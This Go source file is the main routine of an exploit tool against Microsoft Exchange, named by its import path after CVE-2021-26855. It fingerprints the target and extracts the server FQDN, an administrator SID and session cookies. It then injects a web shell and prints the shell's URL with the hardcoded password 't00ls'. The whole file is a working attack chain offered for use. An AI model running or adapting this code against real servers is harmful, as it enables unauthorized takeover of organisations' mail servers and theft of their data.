package main

import (
	"CVE202126855/lib"
	"flag"
	"fmt"
	"math/rand"
	"os"
)

func main() {

	var url string
	var mail string
	flag.StringVar(&url, "host", "", "[?] TarGet Host IP Addr Or Domain")
	flag.StringVar(&mail, "mail", "", "[?] TarGet Host Full Emaill Address")
	flag.Parse()
	if len(url) < 7 && len(mail) < 6 {
		fmt.Println("[?] 小朋友，你是否有很多问号??????????")
		return
	}
	str := randStr()
	reqURL := `https://` + url + `/ecp/` + str + `.js`
	fingerPrint := lib.FingerPrint(url)
	if fingerPrint != true {
		fmt.Println("[x] Finger Not Match Please Make Sure Target Is Exchange?")
		return
	} else {
		fmt.Println("[√] Finger Matched Target Is Exchange!")
	}

	FQDN, b := lib.GetFQDN(url, str)
	if b != true {
		fmt.Println("[x] FQDN Not Found Maybe This Exchange Is Fixed ?")
		return
	} else {
		fmt.Printf("[√] Found The Server FQDN --> %s\n", FQDN)
	}
	discover, serverDN := lib.AccountDiscover(reqURL, FQDN, mail)
	sid := lib.GetSID(reqURL, FQDN, discover, serverDN)
	fmt.Printf("[√] Get It Administrator SID --> %s\n", sid)
	netcookie, exsession := lib.GetCookie(reqURL, FQDN, sid)
	fmt.Printf("[√] Get It ASPNETSessionId Cookie --> %s\n", netcookie)
	fmt.Printf("[√] Get It msExchEcpCanary Cookie --> %s\n", exsession)
	aob := lib.SetAOB(reqURL, FQDN, sid, netcookie, exsession)
	if aob != "nil" {
		fmt.Printf("[√] Get It ExchangeAOB Key --> %s\n", aob)
	}
	_ = lib.ShellInject(reqURL, FQDN, sid, netcookie, exsession, aob)

	ready := lib.GetReady(reqURL, FQDN, sid, exsession, netcookie)
	if ready == true {
		fmt.Printf("[√] WebShell Inject Finish Status --> %s\n", "SuccessFully")
		lib.OutPut(reqURL, str, FQDN, sid, aob, exsession, netcookie)
	} else {
		fmt.Printf("[x] WebShell Inject Finish Status --> %s\n", "Failed!")
		return
	}
	result := lib.OutPut(reqURL, str, FQDN, sid, aob, exsession, netcookie)
	if result == true {
		fmt.Printf("[√] WebShell URL Is --> %s , Password Is t00ls\n", "https://"+url+"/owa/auth/t00ls-"+str+".aspx")
		os.Exit(0)
	}
}

func randStr() string {
	randbyte := make([]byte, 3)
	rand.Read(randbyte)
	return fmt.Sprintf("%x", randbyte)
}
